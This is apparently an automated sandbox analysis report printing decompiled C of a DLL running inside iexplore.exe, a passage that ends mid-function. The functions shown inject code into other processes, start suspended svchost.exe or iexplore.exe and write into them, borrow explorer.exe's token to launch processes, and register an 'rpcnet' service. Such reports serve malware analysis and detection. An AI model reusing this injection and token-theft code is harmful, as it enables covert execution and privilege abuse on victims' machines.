  • Opcode ID: aa518ea17f52b92e445a0360ba050068f0f46623d0a655a4edf19cff0dc9ddbb
  • Instruction ID: cac046f5e760f0a29d4f7e5bf99a1d4e3a1b154928ebae07cd67838b8cd1f331
  • Opcode Fuzzy Hash: aa518ea17f52b92e445a0360ba050068f0f46623d0a655a4edf19cff0dc9ddbb
  • Instruction Fuzzy Hash: C9114F31610745AFC722CF59C890A8ABBE5EF95351B14D81EE85E87212D731A981CB54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B21C2C(intOrPtr _a4) {
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				E72B21F95(_t3, _t4, _t5, _t6, _t7, _t8, _a4); // executed
				ExitThread(0);
			}

APIs
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
    • Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
    • Part of subcall function 72B21F95: ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
    • Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
    • Part of subcall function 72B21F95: CloseHandle.KERNEL32(00000000), ref: 72B220D9
  • ExitThread.KERNEL32 ref: 72B21C39
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: HandleThread$CloseCreateExitMultipleObjectsRemoteResumeWait
  • String ID:
  • API String ID: 3079971139-0
  • Opcode ID: 13a744b9dc27f918067d674f95bd2fbcceb96cfaed7602e2083019f0078df6d6
  • Instruction ID: 8207a6a918aad3a41bed777c7a348672e9e46877dcf1a2a6b4e42e1e27abc60a
  • Opcode Fuzzy Hash: 13a744b9dc27f918067d674f95bd2fbcceb96cfaed7602e2083019f0078df6d6
  • Instruction Fuzzy Hash: 4AB0127005830CBBC6003F56CC09B093E9ADB40782F009014F50C190639B61550145A2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22414() {
				void* _t7;

				 *(_t7 - 0x1c) =  *(_t7 - 0x1c) & 0x00000000;
				 *(_t7 - 4) =  *(_t7 - 4) | 0xffffffff;
				ExitThread( *(_t7 - 0x1c));
			}

APIs
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: ExitThread
  • String ID:
  • API String ID: 2158977761-0
  • Opcode ID: 1e6976981a38066e4e8df456abda2e4b1028b09f249d7f2710593fe4701e50f5
  • Instruction ID: 483b617358438d905fdb998ea22e0a77d6154b95692ace215674c7f6aa0f4695
  • Opcode Fuzzy Hash: 1e6976981a38066e4e8df456abda2e4b1028b09f249d7f2710593fe4701e50f5
  • Instruction Fuzzy Hash: 5AC04C31C1030ADBCF118B91C90A3AEBB71EB00321F2083489431720E5C73406229F51
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 92%
			E72B22123(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				void* _t49;
				long _t51;
				void* _t56;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_push(0x20);
				_push(0x72b253b8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
				_t51 = 0x10000;
				 *(_t58 - 0x24) =  *(_t58 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t58 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t58 - 0x20) != 0) {
						FreeLibrary( *(_t58 - 0x20));
					}
					if( *(_t58 - 0x1c) != 0) {
						LocalFree( *(_t58 - 0x1c));
					}
					return E72B2159C( *(_t58 - 0x24), _t49);
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t58 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t58 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t51);
					 *(_t58 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t58 - 0x28)(5, _t35, _t51, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t56 =  *(_t58 - 0x1c);
						 *(_t58 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t56 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t58 - 0x2c)() != 0) {
								goto L14;
							}
							_t57 = OpenProcess(0x410, 0,  *(_t56 + 0x44));
							if(_t57 != 0) {
								OpenProcessToken(_t57, 0x200ff, _t58 - 0x24);
								CloseHandle(_t57);
							}
							L16:
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t56 == 0) {
								goto L16;
							}
							_t56 = _t56 +  *_t56;
							 *(_t58 - 0x30) = _t56;
						}
					}
					LocalFree( *(_t58 - 0x1c));
					 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
					_t51 = _t51 + _t51;
					goto L8;
				}
				goto L17;
			}

APIs
  • LoadLibraryA.KERNEL32(ntdll.dll,72B253B8), ref: 72B22141
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 72B22160
  • GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 72B22173
  • LocalAlloc.KERNEL32(00000040,00010000), ref: 72B22188
  • LocalFree.KERNEL32(00000000), ref: 72B221AB
  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 72B221E8
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 72B221FE
  • CloseHandle.KERNEL32(00000000), ref: 72B22205
  • FreeLibrary.KERNEL32(00000000), ref: 72B2222C
  • LocalFree.KERNEL32(00000000), ref: 72B2223B
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
  • String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
  • API String ID: 3808024924-2858649656
  • Opcode ID: 1214e861dfd24a073f152453c9708aab208a02f4c40c9a4fba5c7a5505168f17
  • Instruction ID: 2cd11ee1f3bcf27d2bb61f551ead356f26b6ede089a07f4ab670a0598fbe968c
  • Opcode Fuzzy Hash: 1214e861dfd24a073f152453c9708aab208a02f4c40c9a4fba5c7a5505168f17
  • Instruction Fuzzy Hash: C831C332D503169FDB128FA9CD48B9EB6F4EF88317F210529E65AF6146DB764840CF50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			E72B227D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E72B224BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004), ref: 72B227EC
  • lstrlenA.KERNEL32(?,00000000), ref: 72B227FD
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001), ref: 72B2280A
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000), ref: 72B22832
    • Part of subcall function 72B224BC: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 72B224E1
    • Part of subcall function 72B224BC: CloseHandle.KERNEL32(?), ref: 72B22523
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
  • String ID:
  • API String ID: 4087653319-0
  • Opcode ID: 6b35ee75928023d1c373a9683a9845aab3ec622a5c90f6c3e7093c0e23957cee
  • Instruction ID: 0632e4a538d9950daad9f33b8e47e12d35339e81be77794994d5613153f95a79
  • Opcode Fuzzy Hash: 6b35ee75928023d1c373a9683a9845aab3ec622a5c90f6c3e7093c0e23957cee
  • Instruction Fuzzy Hash: 16018176140384FBE7218A66CC49F9B3FBCEF89B92F215418BA0AE6182D675D900C774
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E72B22ADB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t67;
				void* _t70;
				intOrPtr _t84;
				intOrPtr _t93;
				void* _t117;
				void* _t119;
				struct _STARTUPINFOA _t121;
				void** _t122;
				void* _t125;

				_t119 = __edx;
				_t117 = __ecx;
				_push(0x180);
				_push(0x72b25410);
				E72B24A94(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t125 - 0x1c)) = 0;
				 *((intOrPtr*)(_t125 - 0x3c)) = 0;
				_t67 =  *0x72b26008; // 0x72b27204
				_t3 = _t67 + 0x34; // 0x72b232de
				 *((intOrPtr*)(_t125 - 0x24)) =  *_t3;
				 *(_t125 - 0x40) = 0;
				 *(_t125 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t125 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
					E72B22D0B(0);
					return E72B2159C( *((intOrPtr*)(_t125 - 0x1c)), _t119);
				} else {
					_t121 = 0x44;
					E72B24D2D(_t125 - 0x8c, 0, _t121);
					 *(_t125 - 0x8c) = _t121;
					 *((short*)(_t125 - 0x5c)) = 0;
					 *((intOrPtr*)(_t125 - 0x60)) = 0x181;
					 *(_t125 - 0x4c) =  *(_t125 - 0x38);
					if( *((intOrPtr*)(_t125 - 0x24)) == 0 || E72B22598(_t125 - 0x190, 0x104) == 0) {
						E72B22842(_t125 - 0x190, 1);
					}
					if( *(_t125 + 8) == 0) {
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessA(0, _t125 - 0x190, 0, 0, 1, 4, 0, 0, _t125 - 0x8c, _t125 - 0x34);
					} else {
						_t122 = _t125 + 8;
						 *(_t125 - 0x20) = 0;
						 *(_t125 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t125 + 8), 0x2000000, 0, 0, 1, _t125 - 0x20) != 0) {
							SetTokenInformation( *(_t125 - 0x20), 0xc, _t125 - 0x44, 4);
							_t122 = _t125 - 0x20;
						}
						_push(0);
						_push( *_t122);
						_push(_t125 - 0x40);
						L72B2446E();
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessAsUserA( *_t122, 0, _t125 - 0x190, 0, 0, 1, 0x404,  *(_t125 - 0x40), 0, _t125 - 0x8c, _t125 - 0x34);
						if( *(_t125 - 0x20) != 0) {
							CloseHandle( *(_t125 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
						L13:
						_t84 =  *((intOrPtr*)(_t125 - 0x1c));
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							_t84 =  *0x72b260c4; // 0x72b20000
						}
						WriteProcessMemory( *(_t125 - 0x34), _t84 -  *0x72b260c4 + 0x72b260c8, 0x72b260c8, 0x80, 0);
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							ResumeThread( *(_t125 - 0x30));
							goto L23;
						} else {
							_t93 =  *0x72b26008; // 0x72b27204
							_t49 = _t93 + 0x34; // 0x72b232de
							E72B224BC(0x72b260c8,  *(_t125 - 0x34),  *_t49, 0, 0, _t125 - 0x1c, 0);
							if( *((intOrPtr*)(_t125 - 0x1c)) != 0) {
								L23:
								__eflags =  *0x72b26038; // 0x1
								if(__eflags != 0) {
									E72B22758( *(_t125 - 0x34));
									 *(_t125 - 0x34) = 0;
								} else {
									 *((intOrPtr*)(_t125 - 0x3c)) = CreateThread(0, 0, E72B22758,  *(_t125 - 0x34), 0, _t125 - 0x48);
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *((intOrPtr*)(_t125 - 0x1c)) == 0) {
							L18:
							if( *(_t125 - 0x34) != 0) {
								TerminateProcess( *(_t125 - 0x34), 0);
								CloseHandle( *(_t125 - 0x34));
							}
							if( *(_t125 - 0x30) != 0) {
								CloseHandle( *(_t125 - 0x30));
							}
							goto L26;
						}
						E72B22842(_t125 - 0x190, 0);
						 *((intOrPtr*)(_t125 - 0x1c)) = E72B227D2(_t117, _t125 - 0x190,  *(_t125 - 0x34), 0);
						goto L13;
					}
				}
			}

APIs
  • GetCurrentProcessId.KERNEL32(72B25410,00000180,72B232A3,00000000,00000001), ref: 72B22B03
  • OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 72B22B13
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,?), ref: 72B22B92
  • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 72B22BA7
  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 72B22BB7
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 72B22BDD
  • CloseHandle.KERNEL32(?), ref: 72B22BEE
  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 72B22C10
  • WriteProcessMemory.KERNEL32(?,?,72B260C8,00000080,00000000), ref: 72B22C70
  • TerminateProcess.KERNEL32(?,00000000), ref: 72B22CA0
    • Part of subcall function 72B22598: GetSystemDirectoryA.KERNEL32 ref: 72B225AF
    • Part of subcall function 72B22598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • CloseHandle.KERNEL32(?), ref: 72B22CA9
  • CloseHandle.KERNEL32(?), ref: 72B22CB7
  • ResumeThread.KERNEL32(?), ref: 72B22CC2
  • CreateThread.KERNEL32(00000000,00000000,Function_00002758,?,00000000,?), ref: 72B22CDF
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
  • String ID:
  • API String ID: 1678882957-0
  • Opcode ID: 9436f0aca18cbd3cba0aed46c66ddd1149d9c476bfbe7d6ea7b0461c2af8d935
  • Instruction ID: f5b20b8953284a8165a29b877f7eeecf3b44c4b9faa719a56fe60fce383bd0f6
  • Opcode Fuzzy Hash: 9436f0aca18cbd3cba0aed46c66ddd1149d9c476bfbe7d6ea7b0461c2af8d935
  • Instruction Fuzzy Hash: C961F7B2812228AFDB218F95CD48EDEBBB9FF08742F10445AF60AE2111D7305A45CFA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0x72b260c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8);
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0);
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0);
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0x72b260c4; // 0x72b20000
							_t12 = _t28 + 0x3c; // 0x48
							_t40 =  *_t12 + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0);
							WriteFile(_t48,  &_a8, 2,  &_a4, 0);
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}

APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 72B2285D
  • lstrcpyA.KERNEL32(?,?), ref: 72B22893
  • lstrlenA.KERNEL32(?), ref: 72B22896
  • lstrcmpiA.KERNEL32(-00000003,72B212DC), ref: 72B228A4
  • lstrcpyA.KERNEL32(-00000003,72B212DC), ref: 72B228B6
  • CopyFileA.KERNEL32 ref: 72B228C3
  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 72B228DA
  • SetFilePointer.KERNEL32(00000000,00000032,00000000,00000000), ref: 72B2291F
  • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 72B22931
  • CloseHandle.KERNEL32(00000000), ref: 72B22938
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 3010676052-2048111982
  • Opcode ID: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction ID: 39e45ebfadebca685611a7423d435aa536271cb13803ea72af992d0feb52d8ed
  • Opcode Fuzzy Hash: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction Fuzzy Hash: C331B636500218BBDB209F56CD48FEB3BFCEF85795F118469FA4AE7142E6308545CB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;
				void* _t36;

				_t32 = 0;
				_t36 =  *0x72b26038 - _t32; // 0x1
				if(_t36 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}

APIs
  • GetSystemDirectoryA.KERNEL32 ref: 72B225AF
  • lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe), ref: 72B225D5
  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 72B225ED
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 72B2260C
  • RegCloseKey.ADVAPI32(?), ref: 72B22615
  • lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 72B22625
  • GetBinaryTypeA.KERNEL32(?,?), ref: 72B22630
Strings
  • \Internet Explorer\iexplore.exe, xrefs: 72B2261F
  • ProgramFilesDir, xrefs: 72B22644
  • \svchost.exe, xrefs: 72B225B5
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 72B225CF
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
  • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
  • API String ID: 2611574897-1971102070
  • Opcode ID: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction ID: aa450610dbcd0adc5716e67513ca5fe787850a5d435588086c1ad627bace7870
  • Opcode Fuzzy Hash: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction Fuzzy Hash: 2C218E37560344BBDB129E69CC08BDB7BFDEF84286F214529F94AE6006E7308A51CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 72B2495C
  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 72B2497A
  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 72B24987
  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 72B24994
  • FreeLibrary.KERNEL32(?), ref: 72B249D8
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: AddressProc$Library$FreeLoad
  • String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
  • API String ID: 2449869053-171673395
  • Opcode ID: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction ID: da1224439bb4948f671e8665be7783c961a7690319e1cb8d5b89657dbbdfc4a5
  • Opcode Fuzzy Hash: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
  • Instruction Fuzzy Hash: 97415072900209AFDF12CF55CC84BDA7FB9EF85351F1481AABE09AF145D770A645CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B22658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0x72b260a4 = CreateEventA(0, 1, 0, 0);
				 *0x72b26010 = 0x10;
				 *0x72b2601c = 0x42a;
				 *0x72b26020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E72B21EEB);
				 *0x72b260bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0x72b26018 = 1;
					E72B22266();
					 *0x72b26018 = 5;
					E72B22266(4, 0, 0);
					E72B22296();
					 *0x72b2601c = 0;
					 *0x72b26020 = 0;
					_t11 = CreateThread(0, 0, E72B23161, 0, 0,  &_v12);
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0x72b260a4, 0xffffffff);
						_t13 =  *0x72b2600c; // 0x1004c
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0x72b26020 = _t24;
					}
					CloseHandle( *0x72b260a4);
					_t6 = E72B22266(1, 0, 0);
				}
				return _t6;
			}

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B22668
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,72B21EEB), ref: 72B22697
    • Part of subcall function 72B22266: SetServiceStatus.ADVAPI32(72B26010,?,72B226C0,00000002,00001388,00000000), ref: 72B2228C
    • Part of subcall function 72B22296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
    • Part of subcall function 72B22296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
    • Part of subcall function 72B22296: RegEnumValueA.ADVAPI32 ref: 72B22300
    • Part of subcall function 72B22296: RegCloseKey.ADVAPI32(?), ref: 72B22309
  • CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B226F1
  • WaitForSingleObject.KERNEL32(000000FF), ref: 72B22714
  • PostMessageA.USER32 ref: 72B22724
  • WaitForSingleObject.KERNEL32(?,00007530), ref: 72B22732
  • CloseHandle.KERNEL32(?), ref: 72B22737
  • CloseHandle.KERNEL32 ref: 72B22743
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
  • String ID: rpcnet
  • API String ID: 2965456292-717388198
  • Opcode ID: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction ID: 02e831f8f98af63f743597e7f97a2177f381f5a52501a144112e9f4fabe84738
  • Opcode Fuzzy Hash: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
  • Instruction Fuzzy Hash: 87216BB2591364BBD7315B5B8C88F9B3EE8FB497E2B22091DF209D7142C3740900EBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B216BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
